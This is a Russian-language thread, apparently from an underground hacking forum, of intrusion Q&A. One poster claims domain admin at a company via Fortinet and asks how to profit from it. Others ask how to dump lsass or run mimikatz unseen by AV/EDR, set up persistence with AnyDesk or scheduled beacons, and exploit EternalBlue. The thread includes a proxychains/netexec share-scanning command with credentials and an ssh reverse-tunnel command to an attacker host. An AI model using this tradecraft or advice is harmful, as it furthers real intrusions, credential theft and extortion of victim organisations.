вряд ли ты это сделаешь, разве что приостановишь процессы ав/едр сделаешь что нужно и запустишь обратно.Как использовать metasploit или mimikatz при наличии AV / EDR и не получить алерт?
Уж очень больно интересно, как это делается!
вряд ли ты это сделаешь, разве что приостановишь процессы ав/едр сделаешь что нужно и запустишь обратно.Как использовать metasploit или mimikatz при наличии AV / EDR и не получить алерт?
Уж очень больно интересно, как это делается!
Приветствую, исследовал я получается форти, смог получить админа домена. А что дальше делать не знаю, как получить выгоду с этого? В zoominfo Revenue <$5 Million, но как я понял у них еще филиалов много. Вливался в тему ради интереса, с этого можно получить выгоду? В гайде бастерлорда этот момент не понятен, плюс много терминов которые я еще не знаю.
Посмотреть вложение 98421
Посмотреть вложение 98422
Был в такой же ситуации, недавно…Уважаемый пользователи xatab APT и другие белые хакеры, системные администраторы. Подскажите, пожалуйста
решаю таск. нашел шару в которую могу записывать. теперь надо найти на каком хосте она. как под соксом просканировать сеть /16 узнать где smb доступен, где запись доступна.
proxychains -f proxychains.conf -q netexec smb ip/16 -u user -p pass --shares
как добиться максимальной скорости /16 подсеть это 65 тысяч хостов сканить надо.
Если я не ошибаюсь netexec по дефолту использует 100 потоков.
Во вторых я использую 1 конфиг
socks5 127.0.0.1 1090
Может нужно что-то интересное придумать. Смотреть во что-то из разряда слепая скуля sqlmap 5 окон))
Ну типа сетку поделить и сканить в 3 терминала?
Anydesk самый простой вариантПривет
подскажите, пожалуйста, по закрепам
Бесплатные и плантыне варианты
Буду очень благодарен за советы
да это потяно,а есть другие варианты ?Anydesk самый простой вариант
Ну как вариант это маячок в планировщик закинуть чтобы он каждый час запускался, или в авторан закинутьПривет
подскажите, пожалуйста, по закрепам
Бесплатные и плантыне варианты
Буду очень благодарен за советы
Вариант Conti?Anydesk самый простой вариант
Да все верно он самыйВариант Conti?
подскажиет ,пожалуйста ,как это вариант Conti?Да все верно он самый
слева у тебя QEMU, справа у тебя консоль, про какую консоль ты спрашиваешь - непонятноВсем привет. Мне нужно было установить виртуалку, установил виртуалку, но почему то нет у меня консоли, при подключении к виртуалке. подскажите, что делаю не так?
Этот вариант всплыл в слитой методички от данной группы, поэтому тут на форумеподскажиет ,пожалуйста ,как это вариант Conti?
Как дампнуть lsass.exe при наличии AV без алерта?
В соседнем треде решение http://xss.pro/threads/129570Как использовать metasploit или mimikatz при наличии AV / EDR и не получить алерт?
Уж очень больно интересно, как это делается!
это тред по обходу EDR в целом, а он про lsass спрашивает. Будет behaviour детект на открытие lsass handle или на ReadProcessMemory из него, хоть на пайтоне пиши, хоть на Си.В соседнем треде решение http://xss.pro/threads/129570
1) попробуй разные опции "show targets"Есть проблема, пытаюсь пробиться в сети, есть комп уязвимый etetnalblue при попытке его ломануть
Errno::ECONNRESET: An existing connection was forcibly closed by remote host(explloit через msfconsole)
Я понимаю проблема в прирывание конекта, проверил порт открыт, нмапом просканил пишет уязвим, пробовал шифровать эксплоит через x86/shikata_ga_nai но все таже проблема
Вопрос в том, как его пробить?
Это тот же самый ssh как и в линуксе от OpenSSH так что в линуксе просто напиши "man ssh" и читай.Где почитать про sshd.exe и про то как сделать из него реверс-прокси под Windows системы?
Remote Forwarding:
ssh -N -R 9998 kali@192.168.45.164